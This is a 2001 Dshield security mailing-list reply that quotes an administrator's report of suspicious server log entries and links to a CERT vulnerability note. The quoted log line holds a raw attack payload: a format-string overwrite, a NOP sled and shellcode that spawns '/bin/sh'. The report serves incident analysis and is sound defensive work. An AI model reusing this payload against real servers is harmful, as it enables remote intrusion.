[Dshield] Re2: Dshield digest, Vol 1 #334 - 1 msg

poweredbysun jimlynch at poweredbysun.com
Fri Nov 16 03:45:45 GMT 2001


This link has a bit more info:
http://www.kb.cert.org/vuls/id/382365
for whatever it is worth.
Jim
dshield-request at dshield.org wrote:
> 
> Send Dshield mailing list submissions to
>         dshield at dshield.org
> 
> To subscribe or unsubscribe via the World Wide Web, visit
>         http://www1.dshield.org/mailman/listinfo/dshield
> or, via email, send a message with subject or body 'help' to
>         dshield-request at dshield.org
> 
> You can reach the person managing the list at
>         dshield-admin at dshield.org
> 
> When replying, please edit your Subject line so it is more specific
> than "Re: Contents of Dshield digest..."
> 
> Today's Topics:
> 
>    1. buffer overflow? (ALEPH0)
> 
> --__--__--
> 
> Message: 1
> From: "ALEPH0" <aleph0 at pacbell.net>
> To: "Dshield List" <dshield at dshield.org>
> Date: Wed, 14 Nov 2001 21:45:37 -0800
> Subject: [Dshield] buffer overflow?
> Reply-To: dshield at dshield.org
> 
> Found these in my logs (copy/paste from vi).  Looks like a buffer overflow
> to get a shell attempt.  They are in repetitive groups and on each of my
> servers on one of my networks.  Anyone know this one in particcular and if I
> should be concerned?  What I don't know is what is SERVER here.
> 
> Nov 14 20:43:31 hostname SERVER[4302]: Dispatch_input: bad request line
> 'BBì¿í¿î¿ï¿XXXXXXXXXXXXXXXXXX%.172u%300$n%.17u%301$n%.253u%302$n%.192u%303$n
> ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P
> ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P
> ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P
> ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P
> ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P
> ~P~P~P~P~P~P~P~P~P~P1Û1É1À°FÍ~@~Iå1Ò²f~I
> 1É~IËC~I]øC~I]ôK~IMü~MMôÍ~@1É~IEôCf~I]ìfÇEî^O'~IM ~MEì~IEøÆEü^P~I ~MMôÍ~@~I
> CCÍ~@~I CÍ~@~IÃ1ɲ?~I Í~@~I
> AÍ~@ë^X^~Iu^H1À~HF^G~IE^L°^K~Ió~MM^H~MU^LÍ~@èã/bin/sh'
> 
> I also run a bunch of homebuilt fake logging daemons on many trojan ports
> and found on this same network a lot of activity on port 27374 starting a
> couple days ago.
> 
> --__--__--
> 
> _______________________________________________
> Dshield mailing list
> Dshield at dshield.org
> http://www1.dshield.org/mailman/listinfo/dshield
> 
> End of Dshield Digest




More information about the list mailing list